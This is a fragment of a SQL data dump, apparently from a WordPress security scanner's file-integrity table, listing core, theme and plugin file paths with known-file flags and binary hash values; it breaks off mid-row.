@z6�\0`��/�','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ջ}��B��H��71','��\"�beTb�$����׉�\n���~�ln��','',0,'?'),('崕�?��[œ�P�i��','wp-content/plugins/wordpress-seo/js/dist/languages/el.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ץ�b*8M㧉j','��D��C;?��A����蹚��A�-��r�`�r','',0,'?'),('�Ϋp�q��,ެ�Zq\0','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��gi7�n������.','tF�SNZ<�\Z�dy�zt��Ot�|a��]��C�','',0,'?'),('���TP��5�<��蜻','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/uk.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U@�\r�N�� Q�[�y','(�L�]9�t��C@�űJg�؀hW����3','',0,'?'),('��h�v���_EŮ���','wp-includes/wp-includes/class-wp-http-encoding.php',0,'Usg2eޫj9�EA����','Usg2eޫj9�EA����','t��1��XZ��C�9��c��x](D[9��O�','',0,'?'),('�����һ9|��','wp-content/plugins/wordpress-seo/src/conditionals/premium-inactive-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2GY�Q��)w]�J','��I��w� JwS���\0�e��Q�w�d��','',0,'?'),('��y�9*�I�H�h','wp-content/plugins/redirection/locale/redirection-gl_ES.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�Ie\'e�6#p\ZD','�ѫ��\Z���C�Z�F�xj�L[�*�kC#�i','',0,'?'),('���9n��w3�f=�B��','wp-content/plugins/redirection/actions/random.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' tLU?��/�}Pd`v','����w\r�߭C\0;K�\0ߏ��J,�躻�','',0,'?'),('��\"f�C5%ǁ�n��#','wp-content/plugins/wordpress-seo/css/dist/installation-success-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dg��5\\��_4db�+�','4\0+7����X���F,�o�뮈�t%���;�','',0,'?'),('��O,�T�\\<�;I�','wp-includes/wp-includes/ms-files.php',0,'Z�]G���y��2D','Z�]G���y��2D','�Z�h�x�^�/������#���Z^N��_\Z','',0,'?'),('�\r�b\\��ɍ�\Z��','wp-admin/edit-form-advanced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������_�e�I��j','*�_2��r��F�|3v+�Ș�q0�>Kwfi','',0,'?'),('�vџ�H���5%','wp-includes/blocks/site-logo/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cG6����H+�#��{','7|A��E����\\o�\'�[�[gB]ծs,-�','',0,'?'),('�+;5\nG3�yq9�����','wp-content/plugins/wp-cerber/assets/flags/sb.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڻ4s��;�����','�X\n�)��?�1�XF�BX+�Ճ�\n�2i�l','',0,'?'),('�+���.��eF��','wp-admin/css/dashboard.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m����;*\0�H���~`','�T�\n(qy,��J}\ZɄ�t3�G�V�e�f�L�','',0,'?'),('�/�P&aC2�!f2Z��n','wp-includes/wp-includes/js/underscore.min.js',0,' >��>��S����b�%',' >��>��S����b�%',' ʍ��LM>	�ύ��5́kv��k�PHɇ0','',0,'?'),('�9e���kk�R�o���S','wp-includes/embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o��\r�k�ca�����3','��M*��딛�]�3���e.?��Nf��o��','',0,'?'),('�@08a\\�3��u���','wp-content/plugins/wordpress-seo/src/conditionals/no-conditionals-trait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!H��Rk+3���Wx�','�΀�b�h��̩sJ��rT�u�,*�,�]ގB','',0,'?'),('�G��5�@����07��','wp-includes/images/blank.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ʟg��h�kK��f','>��E�G��L�� E��JQ���|�B���ij�','',0,'?'),('�J~_o�f�k�����','wp-includes/js/wp-embed.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';H���7\Z�b��7u1E','gIYK�z� ����\0[����N�)�[up%�ޞ','',0,'?'),('�P��q�˜L�:\Z�ѿ','wp-content/plugins/wp-cerber/assets/flags/mw.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� ���\'�4','h�wR/\\`W��\ny=ߗF`9��\\ �#�^X','',0,'?'),('�b�լ��*���3��','wp-content/plugins/wp-fastest-cache/js/column.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GdY�`�>��Q�ѡE','���Y�[��!�	T�_�/.)��d[\r�\Z�','',0,'?'),('恴L�ޠe���/�u�','wp-content/plugins/wp-cerber/assets/scanner.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l[����Y���yX�%','������1A��GdR��	g���m�U���','',0,'?'),('�,�$�|�W����','wp-includes/wp-includes/theme-compat/embed.php',0,'�Ţs�^��q�cb�','�Ţs�^��q�cb�','W���5T�p��;-�n��0�a����O\n��','',0,'?'),('�漢�����%����','wp-includes/wp-includes/js/dist/a11y.js',0,'�Ɲ���լިF��','�Ɲ���լިF��','��w���R�x��$�r�դɯ�D���`.��u','',0,'?'),('椞�KIЏ\Z�Ɨ�','wp-content/plugins/wp-fastest-cache/js/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Fȇ���Mr���','<�=8fS823���&��Ao�\r�\"�2����','',0,'?'),('様��7�^�b�\"�','wp-content/plugins/wordfence/images/back_disabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h���g��i���>','�䏛N�7�g΋�?�Fb!}��ݿ��C��鳇','',0,'?'),('�g��wߍ�hm���A�','wp-includes/blocks/freeform/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0;�L�W!���rC�LJ','�ھi.zo�M��\\�NG�Q\\Q).?9X�X�\Zӟ','',0,'?'),('�y�l��s�U>�<��','wp-includes/css/customize-preview.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b���Sb�s��\"','ߌ��I�R�\\Ĺ�e��z3�QsC����Q�','',0,'?'),('濟�rY��C�+0��U�','wp-content/plugins/wp-smushit/app/pages/class-webp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N��@%|�l/V}HM8','�2LL<;\0 (�,�g�h���� ׉�7i��','',0,'?'),('����eҕ�h�V�\"�','wp-content/plugins/wordfence/views/options/block-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B��#j�T�,	���D','x��L�a);�%��Ƶ���R*���','',0,'?'),('��W���\"���Sk:�','wp-admin/images/align-center-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���-�r�5*J7�If','�8tf�*Jw�T�^��H�>���1�JD�ο','',0,'?'),('����P�IcD��ƾ�','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����J�s��Ǚ�B','��ER��Jb�ȸI\"��t�],�qP�1\\fD','',0,'?'),('��[L2@��*�‚��I�','wp-includes/blocks/comments-title/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �]C�!�|A�JH\0��','��f )�Cھ�KG�\Z�C����ť L��p�','',0,'?'),('���∽��Ŀ�y','wp-content/themes/hitmag/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v;y\0�$n�dJH/B\r','��\Z����S)�\'��½����]!��-�','',0,'?'),('�⣣�M�O����U�','wp-admin/js/editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���,b�ķ�.\'�',';5E�˕,7�R,���փ�@����K;mt�1','',0,'?'),('���\"�LJ1�C4ND�','wp-content/plugins/wordfence/views/scanner/issue-wfPluginAbandoned.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�pD*����L}�','��f‰���ƾߜ=i���s�8�\Z}�����','',0,'?'),('���;�W����l�','wp-includes/js/dist/deprecated.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8���$��!��yD�&','4[N����#�0��8\0��@�3���h쯪T�','',0,'?'),('����:�����J��','wp-content/plugins/wordpress-seo/vendor_prefixed/chillerlan/php-qrcode/src/Data/QRMatrix.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���=2�~�8١I�\n�','V�;�k�/�T`�;;�l�uq��	]�T˘�G�','',0,'?'),('��Q���o�CP޶�','wp-includes/blocks/navigation-submenu/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5�2�}YHu��\0','���V���.�F�1S9W���<�9�?\\{W�','',0,'?'),('����A�i���.)�','wp-content/plugins/wp-cerber/assets/flags/me.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o1�8V\">����7�','2+���.��\n�Bj�p)C���´�Q�����W','',0,'?'),('��P\r���\\��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Handler/Proxy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'B��j�R���ȉ�','��ߛ���˂޽�/�-2^��� �����4�Ţ','',0,'?'),('�\"�ơ���7vs+�','wp-admin/includes/class-pclzip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�Ah�8L�X�d�Ta�','�8D.�u+�h8Ҳž�,���Wڝ��O','',0,'?'),('�.�\nz��\\G���g','wp-content/plugins/wordpress-seo/src/integrations/abstract-exclude-post-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r\ry���i�\0�d�zv','{��$o���|{?B�A[)m�}��e�ƅ�/z�','',0,'?'),('�2\Z� {D�Z���-','wp-content/plugins/wordfence/fonts/ionicons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���h��I�15[I]J','*��\\&�t䭨\\�	gTw�����,�1���','',0,'?'),('�Djמ�8]fД_�','wp-includes/class-wp-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r���@[��3\0','n���0�A�Xa}���Hgx��\r�Pxˇ�','',0,'?'),('�GeƧ����tn%��T','wp-includes/wp-includes/js/codemirror/jsonlint.js',0,'I)fy��kT�+��<՟','I)fy��kT�+��<՟','�$D;;����0���F�~p��GғF�ˁ��','',0,'?'),('�T�|h0l�-v}h�Z','wp-includes/wp-includes/js/dist/html-entities.js',0,'���2�@؇\0����)','���2�@؇\0����)','�_Z�#W�șf�X���c�B���`��dQfH�,','',0,'?'),('�_}k��%��B��\r','wp-content/plugins/wordpress-seo/src/presenters/open-graph/article-author-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n�����hyb�','Ďj�<�%�d�a{sx�o�LJRx�o�','',0,'?'),('�b`K�\'��컜���K','wp-includes/functions.wp-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��u�=9k�\0�������','���a�;���Dz�s�.A��S���Shף(','',0,'?'),('�mV/�w@a��\rOZ','wp-content/plugins/wp-smushit/app/assets/images/opera-logo@2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Dm}�$Gg�j�\n����','�Byh����@\\��kZ�%�h;�o�Û�w�','',0,'?'),('�x�Δ)NX3u/@�4Y�','wp-includes/rest-api/endpoints/class-wp-rest-block-types-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F���qs�p�>��','����-��:�Q�ѾnV5Δ�6���DE �Tĺ','',0,'?'),('�J��ёe�\rXd��$�','wp-includes/class-wp-customize-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E;\"�KS�U/FҾ�','��({g���?i��U�B�K��\\��g�-��t','',0,'?'),('�\Z�I�������','wp-includes/blocks/social-links/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F襭_�~1��tC�','�8Pə�q���cog�_�#c�����;�2�','',0,'?'),('�%-�+(�묖���','wp-includes/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php',0,'\"�2s7��\\�i#��E','\"�2s7��\\�i#��E','a������t��W��	�3N�\Z��`x�hI�`�','',0,'?'),('�+�뿨\'�)��','wp-includes/wp-includes/js/swfupload/license.txt',0,'��[�`�^�-�o�QWz','��[�`�^�-�o�QWz','��:)��6�a\"3r��\rP\rN�4�yJ�ַ��U�q','',0,'?'),('�kN�>t��,���','wp-includes/blocks/file/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƅd_V���C�nM�|','��^b�➤�*����>A/�\'�,�����K�','',0,'?'),('�6�Si���\rلnT�','wp-includes/blocks/comments/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R�Ȅ���e%X�','t\'˪�l�X��Ƣ�;���͕0=J�m���','',0,'?'),('����#�U~�B�6�I','wp-content/plugins/wp-smushit/_src/js/modules/notice.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c�\0O8Zj�vIq���','�}*��أHF��uêX/�h�c�`��+','',0,'?'),('���K�g���o#�0','wp-activate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H6ۙzq«�<��','QD�$^\0��|:삠�M�@F��P���]-B�','',0,'?'),('�ʼn�	i��/Э','wp-includes/formatting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�(�ko�Mt\Z.&U','њ�ki<#$+y�μVW���:��H߈��Ջ','',0,'?'),('�ΐ��&>B����@��','wp-content/plugins/wordpress-seo/src/presenters/webmaster/baidu-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�4����6Yc�\"���','��l�3�vu��e�R�W$w{P{2�}`','',0,'?'),('����?\"/�@�8Ʒ)','wp-content/plugins/wordpress-seo/vendor_prefixed/symfony/dependency-injection/Exception/ExceptionInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l�ɫ�����e','w�ԾI��!٠\n�`�E����Ĥ������','',0,'?'),('��H���l��{!D#�!','wp-admin/js/color-picker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`l� W+%䆊kc','}�̶�g��uw`h�f��Foz�,drr,,u','',0,'?'),('���L�.dDv��','wp-content/plugins/wordfence/views/scanner/issue-wpscan_directoryList.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n����aH{ڶ��ER�N','տ����o\Z���^�J��U�B�l�5���\n�','',0,'?'),('�����9�)�]O�f','wp-content/themes/hitmag/inc/kirki/assets/images/kirki-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I��<���g�m��N','{4�	�\"-	v]�F���*Ş( <�ߔh�É>','',0,'?'),('��F�ZY��C8��3E','wp-admin/css/colors/blue/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\n���=iI�\Ze','��F��ݐ�𿧦dEr�	��y^��	���rK','',0,'?'),('���5R�q�\Z�X�','wp-content/plugins/wordpress-seo/src/helpers/pagination-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�r�J�v�YP=B��','Vҡ����pE�gY��	l�U�{�܃Rʭ{1V\\','',0,'?'),('����)0{��x�','wp-content/plugins/wordpress-seo/src/helpers/indexing-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���H�T˰�RN�}�','\n\Z���\\�P�Zk��Xl«�Z^z��4yf$�`pp','',0,'?'),('�~�W��S�~�Q�','wp-content/plugins/wordpress-seo/src/presenters/webmaster/yandex-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5&H�J����','G�WQeN~T��EH��s�j��p�\"�n�����','',0,'?'),('��÷�g$�M�s�','wp-content/plugins/wordfence/views/waf/option-rate-limit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E,bٿʊ�N��E\\','|J��\Z^(�����׌�xDsX��8��?�R','',0,'?'),('��XB��A���~�','wp-includes/wp-includes/css/dist/nux/style.min.css',0,'��cڷ�\r�\\Kn]\nO�','��cڷ�\r�\\Kn]\nO�','h��iu���E���UJc]���\\d`M\Zqi	�սq','',0,'?'),('���^��s|w�L�','wp-content/plugins/wordpress-seo/src/config/researcher-languages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=+~]�����.̻�','�� ��7��EZW�1$BB�/��s;ӣp�\'','',0,'?'),('�%y�>}H�o��(6','wp-includes/js/jquery/ui/core.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K����@�$^B�','\"���e�D��w�>r�n�̚.C����m��','',0,'?'),('�Hx^�:�\"��\\���-','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-section-readability.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��,Q-9���+RDNT','�皬�������sߒ �ܬ,�9���R�z�','',0,'?'),('�SHLenP�q7�č�','wp-content/plugins/wordfence/views/scanner/issue-control-edit-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�����`�j|��y�','i��OGi����F|4�8��V��j�\n#V-L','',0,'?'),('�S�I����#���)|','wp-includes/blocks/quote/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�18��.�#�}\Z�A���','l�J�\'���qUdQʹ�����.�i�','',0,'?'),('�]1��#����o�1','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�R\\��%�\0X^���','Y5q/��H��Q2��6UHV��b�MЗ6T���','',0,'?'),('�b+��a�X����X','wp-content/plugins/wordfence/modules/login-security/views/options/option-ntp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!h��\0,� ��%','˃\\B\n��G/͉Cw���9�,$��ŐJ!�8&','',0,'?'),('�f�i�`�=@T��o�','wp-admin/images/spinner.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�\nD�\n�oً�j˲�','zƄ�\Z\"��n\Zs�(�U�/~�7��F��^…�','',0,'?'),('�wj0��67���@�T','wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�2s7��\\�i#��E','a������t��W��	�3N�\Z��`x�hI�`�','',0,'?'),('�{�}SG#C���\\�C�','wp-content/themes/hitmag/inc/kirki/modules/webfont-loader/vendor-typekit/src/modules/typekit.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|^��8��7��!�','�m��`R1�\0��C��p�Y_��<����!宅','',0,'?'),('�J���y��0m�`�/','wp-includes/class-IXR.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0���C`q�x�',']���z�p��q�N\"CKW��鴛��c��M','',0,'?'),('��q��8O��;�A','wp-includes/blocks/shortcode/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ͻ�0E���<��#�','I�D�W�=�~7�����(���3E���b$@x`�','',0,'?'),('�Ò���/���?��k','wp-includes/wp-includes/images/smilies/icon_exclaim.gif',0,':\\��>5�\0r���sg�',':\\��>5�\0r���sg�','�L�ɵ�H��A(�xʓ2�EP%�	��#���#�5','',0,'?'),('�P(���^�Nu�I�','wp-content/themes/twentytwentythree/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/s��#y�� u�?�','���ȳw7����_�]h���I>�ʳO�','',0,'?'),('�\0�]�p��ޑ�	\rG','wp-admin/css/customize-nav-menus.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ow/��7`����`;','ߒ�۫e{����Kd�hGYӺ�dJ�ϒo_�','',0,'?'),('�s�X�3���f�$','wp-includes/blocks/file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�J�#��\r�\n���Ic�','pV��]�z���#\r��.W�r�ژ���×�','',0,'?'),('��00Us�\0m��V�9','wp-includes/wp-includes/js/dist/vendor/lodash.js',0,'2n�B2���]�� �','2n�B2���]�� �','\"��Qe��\\NJhb�Bj�{i�J\n�Қi;eZ�3','',0,'?'),('��e�ȫÆT�k߇&�','wp-content/plugins/wordpress-seo/admin/filters/class-abstract-post-filter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=���rN�����E��t','t �A�2K�;e$��=��[���W���l�','',0,'?'),('������dvoNf;','wp-content/plugins/redirection/locale/redirection-ru_RU.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���o����yjH��','V�7$������Q1�G)�0�BE�5�D�?�>�`','',0,'?'),('�$𽉙l��z��!','wp-includes/wp-includes/js/jquery/ui/effect-transfer.js',0,'OԩN��i���1','OԩN��i���1','Ł\0p�,�\\�!ON)�Q���Xl ��k�s�l�','',0,'?'),('�w�\\ ��6���̓','wp-content/plugins/wp-smushit/_src/js/shared-ui.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8��X��x[Ž5�\n�O','�a�\0�%��QM�x�z�J`��\Z&./���I�','',0,'?'),('覶����p����|�%f','wp-content/themes/hitmag/inc/kirki/modules/postmessage/postmessage.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k�M��;����','���L�2dJ\'�~��3�\n�i������J3w','',0,'?'),('謤j��,����=>','wp-includes/blocks/site-logo/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��A�����c��M','�ta���G;�GvOJij����{$\0xt','',0,'?'),('���\0�O�7�7t���{','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-application-passwords-controller.php',0,'���m3�E�?��՛','���m3�E�?��՛','0pU��Ĭ���h���C�r+���˞I�{-qA�','',0,'?'),('��tU;�56|�4Ql','wp-content/plugins/wp-cerber/assets/select2/dist/js/select2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���|Ԋ2�3�\\�:=�','��	�<�(*Wv���Ћtw��r_��t�i�	','',0,'?'),('��v�w\n�s�̨H5�','wp-content/plugins/all-in-one-wp-security-and-firewall/js/password-strength-tool.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\ZNj�ک&��U��','B+1�E��}�n�7\Z�z�_��Q�̻�3�&','',0,'?'),('���W����:��]','wp-includes/js/dist/primitives.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q��i�p�JD����',';\r��1�$,�jgz$�������U;f*�%','',0,'?'),('��V�>��d��O�d','wp-includes/wp-includes/js/jquery/jquery.form.min.js',0,'܉l�Ȍ��*��D�','܉l�Ȍ��*��D�','zt�O1� =2X����Q���_�y �}Z\r','',0,'?'),('��<|Ɔ3#�`�}�','wp-includes/blocks/separator/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+��\r���Ó�','x�`Y\'��g�vC!�K�qD��w3G[4�P�ô�','',0,'?'),('���Q�o�H*���(�','wp-content/plugins/wordfence/images/sort_asc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��I��+ƾ��=��','d�C�T�����e&,)Ѵ��FG�\Zd�ON�','',0,'?'),('���.�h�z�f���','wp-content/plugins/wordpress-seo/js/dist/languages/nb.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&������]֑�:WD�4','��v\0r���Mh�\"A����n��\'!�� �','',0,'?'),('��U�MU����$�','wp-includes/blocks/latest-posts/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���p��&�INQ,','�3p���X�\\�~=F��\\N�>R��Y|u&��','',0,'?'),('�A$��>���T��.','wp-includes/rest-api/endpoints/class-wp-rest-menu-items-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','68	�u*0\r���^}�','ւ��ݝz3AV�~���\"�k�cW��=n�','',0,'?'),('�+����3�pU','wp-content/plugins/wordfence/lib/wfOnboardingController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�%�̍��ų�<��','ŔWF&�x\Z	�\"�g��ߠ���;�=�D�ٗx','',0,'?'),('�(��v/���&��C)','wp-includes/wp-includes/js/jquery/ui/effect-shake.js',0,'�;5�_������ƽ\"�','�;5�_������ƽ\"�','�$D���IAXF����wH�YO�J3�K��','',0,'?'),('�(��Y�9��c��`�','wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-error-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�as��b��U��\\�̹','����k{Rݫ<F!�	�o��R,u��_F6�X�Q','',0,'?'),('�,<�E´&���ze�M','wp-content/plugins/wordpress-seo/src/presentations/indexable-post-type-presentation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ZH�<�Md�{#7�p�','x4�J*$�k�n���nY}��\\b�,��','',0,'?'),('�-�>��D�g5����','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/tr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�sv��8Q�����O�P','���u±��c>Hʹ}��%�^<r0��y�3�`','',0,'?'),('�F�j!Y�{.J=,��','wp-admin/images/stars.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[����><�k�{��(�','/	��\"���Fa챔<SY��g���؉F��@','',0,'?'),('�]�W/>�}<8� VF�','wp-admin/includes/theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I�=?_�7*�o�W�','���\ro\r$-�}0\ZM�ᴯ0jx����p�\n}u�','',0,'?'),('�^.�jT}�<��I��','wp-admin/js/accordion.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G婓�hd.���uT�','���hV�5�?ۀ:/�z�ԧ�����KgH��l','',0,'?'),('�g���U)\rR(�','wp-includes/js/dist/is-shallow-equal.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�#٦H�,E�Gp','(v���y����	<YM_&��y`�ˢ\"���','',0,'?'),('�u�{������N֫��','wp-content/plugins/wordpress-seo/src/config/migrations/20171228151840_WpYoastIndexable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N!/�(���q��P�+','&u| +�Mv>�X�Pi�����qh����~��','',0,'?'),('�|:��x�Z~�*�wl�','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n����[f��0�=G�','�[G�f����N����	rG�Ƭ���.','',0,'?'),('�T�B3��G��{','wp-includes/Requests/IPv6.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nҤ&�i��\r�','�=��ln&�����ă�J�ӗ���~�����l','',0,'?'),('�;X��^�$>�8','wp-includes/wp-includes/js/jquery/ui/effect-explode.min.js',0,'�Ƒ���l��Ե','�Ƒ���l��Ե','\"�Q�\0_jՈ\'5(ʏ�2&-(��j;�|]','',0,'?'),('�Sq	o�@rL��H','wp-includes/wp-includes/js/mediaelement/mediaelement-and-player.js',0,'���\"���\n�-ۤ�Y','���\"���\n�-ۤ�Y','$9~�=:����Z�F�m}�A�5ks�	V#� �*','',0,'?'),('頻�yN<���9�o\Z<','wp-admin/js/xfn.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<�>B���25�\r1U*�','O	���h^dLgz���Iw�vƄaZ1��','',0,'?'),('�tLH�:��P(��','wp-includes/css/dist/widgets/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<��1����;­','[>�N�Ш��_�Ŷ\'���#>��i2�ς�vٯ','',0,'?'),('��m�Mt���W�B','wp-admin/images/align-left.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�y0�d�Z�o.h��','�_]�<#�S�\"�B^U4_�Q<!@�x?J$��K�','',0,'?'),('�]��{dU�3�p','wp-includes/wp-includes/customize/class-wp-customize-media-control.php',0,'E�lh�¸�j�68��','E�lh�¸�j�68��','V]�l��1W�+	{6v��ޣ��C���=��','',0,'?'),('�c�8��x���ϵ','wp-includes/blocks/preformatted/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)1n8.R���*','v�[��7�/N@3)}�o�x���t�7�Nk��','',0,'?'),('����t���Z�O\'� \n','wp-includes/js/thickbox/macFFBgHack.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ȱg�W�,/u�','Rw�/�h��&q��]Z��_����Ngy��','',0,'?'),('����V,E@�X���y','wp-includes/SimplePie/Cache/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��8?Q��h׊�','~�`��嫌�<��B\n鲙%]��X}\Zi��','',0,'?'),('��s�*p�&�[a�y','wp-includes/wp-includes/js/jquery/ui/effect-pulsate.min.js',0,'4\0�q2�l����d','4\0�q2�l����d','ȩ~��0M���0\"���7	